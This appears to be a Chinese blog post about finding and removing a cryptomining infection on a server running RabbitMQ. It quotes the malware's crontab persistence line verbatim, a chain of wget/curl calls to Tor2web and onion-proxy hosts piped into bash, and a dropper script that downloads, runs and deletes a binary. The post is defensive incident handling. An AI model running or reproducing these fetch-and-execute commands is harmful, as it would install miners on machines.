事情是这样的,发现 RabbitMQ 服务响应非常慢,可以说是基本不响应、无法提供服务了。这时就去服务器上面查看,发现 CPU 的资源被一个叫做
UxYhf8的程序严重占用。
第一次处理
看到 CPU 飙升太高,发现这个程序也不是自己所知道的任何一个程序,所以就怀疑中挖矿病毒了。首先把这个程序给kill掉,只能先kill掉了,不然卡的都快无法操作了。
# 34534:挖矿程序的 pid
$ kill -9 34534
这时 CPU 的资源已经被释放,RabbitMQ 服务也正常了。但是好景不长,没过几分钟就又出来一个新的未知进程IUfh8f(事后经过测试,新进程出现的时间在几分钟到几十分钟变化),这时就想到是不是有定时任务,查看定时任务:
$ crontab -e
10 * * * * (wget -qO- -U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || curl -fskL -A- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.nz/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.nz/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.ws/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.ws/i.sh)|bash
此 i.sh 脚本内容多变,大致如一下:
# i.sh 脚本的内容是
exec &>/dev/null
if ! ps -p $(< /tmp/.X11-lock); then
x=./.y
wget -qU- http://malwregafeg2fdjn.tor2web.xyz/.$(uname -m) -O$x;chmod 777 $x;$x;rm -f $x
fi
发现了这么一个定时任务。把它删掉并清理所有定时相关文件:/etc/cron.d 目录下、/var/spool/cron/ 目录下。至此结束(自认为结束)。
第二次处理
在第一次处理的结果上发现过段时间,挖矿程序又出现了。这是知道问题没有那么简单。可能还残留病毒文件。最后找到几个病毒程序,如下:
/usr/lib/systemd/systemd-logind
/sbin/agetty
/sbin/agetty
$ ps aux | grep -v grep | grep "agetty"
root 26432 0.0 0.0 110044 824 tty1 Ss+ 15:15 0:00 /sbin/agetty --noclear tty1 linux
root 26434 0.0 0.0 110044 784 ttyS0 Ss+ 15:15 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
$ ps aux | grep -v grep | grep "systemd-logind"
root 502 0.0 0.0 24204 1680 ? Ss 2018 0:52 /usr/lib/systemd/systemd-logind
- 先删掉病毒文件
- 杀死病毒程序,一定要多执行几次,我执行了好几次才杀掉。
$ ps aux | grep -v grep | grep "agetty" | awk '{print $2}' | xargs kill -9 && ps aux | grep -v grep | grep "systemd-logind" | awk '{print $2}' | xargs kill -9
至此,完全搞定。
文章评论